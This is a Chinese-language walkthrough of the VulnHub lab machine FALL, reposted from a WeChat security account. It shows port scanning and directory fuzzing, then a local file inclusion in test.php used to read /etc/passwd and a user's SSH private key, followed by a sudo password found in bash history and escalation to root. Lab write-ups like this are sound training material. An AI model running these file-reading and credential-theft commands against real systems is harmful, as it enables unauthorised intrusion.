OSCP难度靶机之FALL

admin 2022年9月29日10:38:32评论21 views字数 1086阅读3分37秒阅读模式

虚拟机信息:虚拟机下载地址:https://www.vulnhub.com/entry/digitalworldlocal-fall,726/虚拟机简介:作者最喜欢的季节,因为它是收获的季节目标:1个flag级别:中级

1、信息收集

1.1 通过netdiscover检测主机IP地址

arp-scan 192.168.207.0/24

OSCP难度靶机之FALL

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.131

查看开放22、80、111、139、443等多个端口

OSCP难度靶机之FALL

OSCP难度靶机之FALL

2、渗透测试

2.1 站点渗透

1.访问WEB站点

发现存在一个账号qiu

OSCP难度靶机之FALL

2.查看CMS版本

查看CMS为 CMS Made Simple ,版本为2.2.15

OSCP难度靶机之FALL

搜索漏洞,发现XSS和文件上传,需要认证成功后才能执行

OSCP难度靶机之FALL

3.使用gobuster进行爆破

gobuster dir -u http://192.168.207.131 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .html,.php,.txt

OSCP难度靶机之FALL

4.测试访问test.php

提示需要在get请求中传入参数

OSCP难度靶机之FALL

测试需要传参的内容,获取到参数为file

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.207.131/test.php?FUZZ=/etc/passwd' -fs 80

OSCP难度靶机之FALL

5.通过file参数获取密码

curl http://192.168.207.131/test.php?file=/etc/passwd

查看存在qiu账号,并且允许登录

OSCP难度靶机之FALL

6.获取qiu账号的登录密钥

curl http://192.168.207.131/test.php?file=/home/qiu/.ssh/id_rsa

OSCP难度靶机之FALL

7.保存密钥文件并修改权限

curl http://192.168.207.131/test.php?file=/home/qiu/.ssh/id_rsa >> id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]

OSCP难度靶机之FALL

3.提权

1.本地提权

1.查看历史命令

以前执行过sudo命令,密码为:remarkablyawesomE

cat .bash_history

OSCP难度靶机之FALL

2.查看sudo权限

该用户拥有所有的sudo权限

sudo -l

OSCP难度靶机之FALL

3.执行sudo提权

sudo su

OSCP难度靶机之FALL

4.查看flag

cd /root
cat proof.txt

OSCP难度靶机之FALL

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之FALL

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月29日10:38:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之FALLhttps://cn-sec.com/archives/1323473.html

发表评论

匿名网友 填写信息